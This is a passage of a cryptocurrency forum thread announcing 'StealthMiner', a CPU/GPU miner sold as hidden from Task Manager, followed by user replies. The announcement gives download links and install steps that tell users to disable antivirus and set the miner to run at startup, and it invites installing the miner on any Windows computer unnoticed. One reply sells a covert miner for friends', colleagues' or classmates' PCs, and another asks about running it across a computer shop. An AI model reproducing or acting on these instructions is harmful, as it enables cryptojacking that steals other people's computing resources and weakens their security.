Bitcoin Forum
April 26, 2024, 12:52:34 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]

Home   Help Search Login Register More  
Pages: « 1 2 [3] 4 »  All
  Print  
Author Topic: [ANN]StealthMiner v2.0 BEST STEALTH MULTICOIN CPU/GPU Miner [ANN]  (Read 24484 times)
pascal.james

Activity: 4
Merit: 0

View Profile
October 14, 2017, 02:37:44 PM

no idea what you mean with stab. there should be 3 files a stub, a dll and the main exe. so just open the main exe.
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.

View Profile Personal Message (Offline)

Ignore
Reply with quote  #2

Report to moderator

View Profile Personal Message (Offline)

Ignore
Reply with quote  #2

Report to moderator
pascal.james

Activity: 4

View Profile
October 14, 2017, 02:44:48 PM

If you have a problem to open a .rar file then here is the zip file:

https://mega.nz/#!gTYERA7B!tWbGpxUkO4NsfRtfqdgT9Yi3cF33UKmWt2Wh1JPgA8Q
snareblast

Activity: 1

View Profile
November 13, 2017, 12:45:59 PM

How to Install StealthMiner 2.0:

1, Download the latest version of StealthMiner: https://mega.nz/#!gOhBUYib!wyLajvOYBe8f-Iy1N4cKh4akD5MIMjB3UFOH7KKDrr0
        2, Unzip the Rar into a folder
        3, Open autorun.txt file and type in your address and password after the command lines you see. DO NOT DELETE THE COMMAND LINES. You can insert a line for each coin or the coins you want to mine. The program will know what to mine based on which pool servers you save.
        Example for Monero: -o stratum+tcp://mine.moneropool.com:3333 -u YOUR_WALLET_ADDRESS -p x
        Example for Ethereum: us1.ethermine.org:4444 -u YOUR_WALLET_ADDRESS -p x
        4, Just SAVE the file as is.

[/list][/list][/list]

autorun.txt did was not inside the rar file, any help?
        tammyp

View Profile
        November 30, 2017, 09:43:45 PM

i want the update please!!! i'm sure i made top 100 list!!!!
        Imago228

Activity: 6

View Profile
        December 02, 2017, 07:35:35 PM

Install keys and click on run install and he writes that autorun.inf already exist
        How to fix it?
        WinterR

View Profile
        December 04, 2017, 08:08:46 PM

Install keys and click on run install and he writes that autorun.inf already exist
        How to fix it?

Same here.
        eckomega

View Profile
        December 11, 2017, 07:39:31 PM

I would love to test this if you are willing to share the link.

Thanks!
        coreyou
        Copper Member

Activity: 173

View Profile
        December 17, 2017, 11:07:08 AM

Hello,
        maybe somebody could help.
        i get sutch Fail message:
        https://1drv.ms/u/s!AvcTEvtZZe3igaghXI2Ui4zShlUhWQ

-Windows 10
        -start as Admin
        -without anitvir
        adhishor

Activity: 8

View Profile
        December 27, 2017, 08:59:56 PM

Hello,

Can I test you stealthminer?

Thank you
        moejoejay

Activity: 138
        Merit: 20

View Profile
        December 28, 2017, 12:07:41 PM

how i can uninstall this miner ?

regards moejoejay
        verlass

Activity: 18

View Profile
        January 09, 2018, 01:59:07 PM

can't find autorun file in the 2.0 version of the miner
        ElMinator

Activity: 32

View Profile
        January 24, 2018, 12:27:34 AM

does it really work?
        flyingplows

Activity: 518
        Merit: 250

View Profile
        February 06, 2018, 08:33:40 PM

One important question was not answered - how to uninstal it? Or is it impossible  Grin

spacegoat664

View Profile
        February 17, 2018, 02:24:33 PM

I would love to test 3.0, and thank you for using your time doing this!
        Fanta Bitcoin

View Profile
        February 26, 2018, 09:36:21 AM

I have tested so many so called stealth or hidden miners and every one, I really mean every one, has been visible in Task manager in some kind of way. Usually as some minername.exe in background process or even worse visible in list of applications in task manager or some kind of StartUp program or process. Not even was ever truly hidden and everybody with even a simple knowledge how computers works can easily find those miners in task manager. Does the stealth miner really even can exist in Task Manager?

So I decide to give even a this program a try but when I try to install this miner every time I get message warning that program has some error during installation, that I can choose Continue installation or Quit. After I click continue nothing happens and after checking a few days and few times my wallets I can say it seem the miner did not finish installation on my computer.

So could malew (the author) or somebody else who was able to install this program show us with video or picture guide how to install this program because there are lots of confusion in installation guide for this program?
        Keineliebe

View Profile
        February 26, 2018, 11:25:35 AM

same problem
        TipsnHowTo

View Profile
        March 16, 2018, 09:58:03 AM

Hi friends,

Most of us want to earn more and more, for this purpose the cryptocurrencies is the best option. You can mine your coins in your CPU/GPU. But the CPU/GPU hashrate is not much better for this, you should need more workers, more PC's, more users etc. But how it is possible, that now one know that his PC is using for my coins mining.

So friends I have design a solution for you. I am a software designer and I have design a console miner which can mine your coins in your friend, colleague, classmates, ...... PC without showing any proof.

You can use this miner with any mineable coin with any console miner. I will configure it on your requirements.

You just simply copy paste the my designed miner directory into your targeted PC and see the results. Moreover friends, this miner can auto start with windows startup. So you just need to use your target PC one time, for copying miner directory.

If you you want to purchase this miner so contact me via https://www.fiverr.com/s2/7b76446a2f

I can give a demo version of this software for your satisfaction.

For detail watch this video
        https://www.youtube.com/watch?v=_3nd05hBQ6o&t=70s

Haakan

Activity: 3

View Profile
        April 18, 2018, 07:43:54 AM
        Last edit: April 23, 2018, 12:41:37 PM by Haakan

Well

1) I don't see any autorun.txt. I see an autorun.ini file.
        2) Would this work with the cryptonight  heavy algo fork?
        3) How do we know if it is working? I guess I'd have to check the pool balance...
        4) Would this survive deepfreeze? or do I need to thaw the system.

is this supported?
        one install on all local network?
        and how about if computer have a deep freeze?
        i want to use in computer shop

To support Deep Freeze it'd have to bypass the process. You need a reboot on each system.

Edit: I've found this fancy vid on youtube explaining it with the autorun.inf:

https://www.youtube.com/watch?v=Dz0eRw0czFs

Khristofle

Activity: 463
        Merit: 36

View Profile WWW
        April 17, 2019, 05:42:31 PM

Hello all

Today

Stealth (XST)
        $4,32 USD (3 550,71%)

Shocked
        yapa ve yalniz

Activity: 463
        Merit: 107

View Profile
        April 17, 2019, 10:18:07 PM

StealthMiner v2.0 - The only MultiCurrency Stealth CPU/GPU Miner

Currently Available Coins to Mine:

StealthMiner 2.0 Released:

StealthMiner 2.0 is the ONLY cryptocurrency mining program that lets you currently mine 6 of the best cryptocoins in COMPLETE STEALTH MODE using both GPU and CPU at a perofrmance level that doesn't affect every day use of your computer.

StealthMiner 2.0 FEATURES:
        • Complete Stealth Miner so it cannot be noticed running in the background. It doesn't show in running programs. ONLY you know that the miner is running. You can run it on multiple computers.
        • Automatically switch between 6 coins to mine based on profitability
        • Smart start upon Windows startup. The program starts mining 5min after bootup to avoid any slow down
        • GPU and CPU mining together based on the activity of the computer. The program auto adjusts mining power so that your computer never slows down yet it mines the most coins possible. If your computer is just on and running it will use more resources etc...
        • Simple setup. All you need to do is open a text file and copy past the pool address and your coins' wallet address and you are ready to go.

How to Install StealthMiner 2.0:

1, Download the latest version of StealthMiner: https://mega.nz/#!gOhBUYib!wyLajvOYBe8f-Iy1N4cKh4akD5MIMjB3UFOH7KKDrr0
        2, Unzip the Rar into a folder
        3, Open autorun.txt file and type in your address and password after the command lines you see. DO NOT DELETE THE COMMAND LINES. You can insert a line for each coin or the coins you want to mine. The program will know what to mine based on which pool servers you save.
        Example for Monero: -o stratum+tcp://mine.moneropool.com:3333 -u YOUR_WALLET_ADDRESS -p x
        Example for Ethereum: us1.ethermine.org:4444 -u YOUR_WALLET_ADDRESS -p x
        5, Run StealthMinerInstaller.exe - Your Antivirus will probably say its a virus, either turn off antivirus or run it as an administrator or add it to antivirus exceptions. All miners get a the virus warning, thats just how it is.  
        6, HERE BE VERY CAREFUL AND MAKE SURE TO CLICK THINGS THE WAY ITS HERE
        7, FIRST click on Install Keys - this will make sure that the software will start on bootup - once you get the success message go on.
        8, NOW click on Run Install - this will install the miner - you will see the you have successfully started mining message.

You are all set. you have started mining. You will be able to check your wallet balance and see your coins accumulate.

------------------------------------------------------------------------------------- StealthMiner 1 Development Notes ------------------------------------------------------------------------------------------------------------------------

Description:

StealthMiner is currently the ONLY miner that can be installed with 1 click and mines in complete stealth mode so nobody can see the program running. Open task manager and go to running programs and see completely nothing . Install this on any windows computer and only you will know that a miner is installed.

Latest Update V1.3 Features:
            Promotion Notice: I am working on the next version that will support Nvidia and AMD video cards as well, and thus achieving 3x H/s by combining video card and Cpu into 1 miner. The program will also be stealth so it will only use performance that your computer doesn't need. If you want to be one of the first to try the CPU&GPU Stealth Miner 2 then please download and install StealhMiner 1.3 and post your username in this thread. The first 100 users will receive the miner for free. First come first serve. Quantity available shall be monitored here from now on:
            • fixed bug that caused program to freeze while install
            • Miner now autoselects mining on either 1 or 2 CPU cores depending on the activity on your computer. So for example if you are playing a game or editing software the miner will automatically adjust and switch to 1 cpu core.
            Latest Version Download: https://mega.nz/#!hDpzlZSC!GcvkGHKUeB1Z4gKGGNEcOKlU8jFrJ0pdjYmg4V39APE

Latest Update V1.2 Features:
              • couple stability bug fixes
              • autoscale feature so, if you install the software on multiple devices it will just automatically add the workers together, no need for setting up multiple workers

Latest Update V1.1 Features:
              • 1 Click Install
              • Supported OP: Only Windows for now.
              • Complete Stealth Mode
              • Automatically launch on windows startup - 1 time setup for life
              • Currently supported coins: Monero - more in development
              • Doesnt use all the CPU, only use just enough to make some money but the user shall never realize that a miner is installed. You can also play games and edit videos and do anything and won't notice performance issues, after many tests I found the perfect balance between H/s and computer performance.
              • Latest CPU miner features for maximum H/s

How to Install: MAKE SURE TO READ EVERY STEP CAREFULLY ESPECIALLY 6 DONT MESS IT UP  Cheesy

Either pause your antivirus or add the software to exceptions, so the miner can be installed. All miners get this, antivirus apparently hate mining softwares haha.

1, Download the miner from here: https://mega.nz/#!hDpzlZSC!GcvkGHKUeB1Z4gKGGNEcOKlU8jFrJ0pdjYmg4V39APE (CLICK DOWNLOAD THROUGH BROWSER - YOU DONT WANT MEGA's ANNOYING PROGRAM  Wink
              2, Unzip the file into a folder
              3, Open autorun file and type in your address and passworrd after the command lines you see. DO NOT DELETE THE COMMAND LINES.
              Example -o stratum+tcp://mine.moneropool.com:3333 -u YOUR_WALLET_ADDRESS -p x
              5, Run AutoMoneroInstaller.exe - Your Antivirus will probably say its a virus, either turn off antivirus or run it as an administrator or add it to antivirus exceptions. All miners get a the virus warning, thats just how it is.  
              6, HERE BE VERY CAREFUL AND MAKE SURE TO CLICK THINGS THE WAY ITS HERE
              7, FIRST click on Install Keys - this will make sure that the software will start on bootup - once you get the success message go on.
              8, NOW click on Run Install - this will install the miner - you will see the you have successfully started mining Monero message.

Thats it, you can check your hashrate on the mining pool you selected for yourself.

Updates and Bug Fixes:

I will make sure to roll out patches and updates continuously. If you encounter a bug please post the issue in the comments section or send me a PM, and I will add it to the needed tasks to do for the next update.
              Also please note this is a work in progress so even though the miner is perfectly functional as I have been testing it for over a month, it may have some bugs. So please be patient, this is a fun project for me and you get this for free. So please be patient and kind and dont blast the post with hateful stuff, I will make sure to fix things as fast as I can.  Wink

Happy Mining.  

[/list][/list][/list]

There seems to be a problem with download links, getting error related to the country. Can you solve it? (I'm talking about links on the main page)

Pages: « 1 2 [3] 4 »  All
                Print  

Jump to: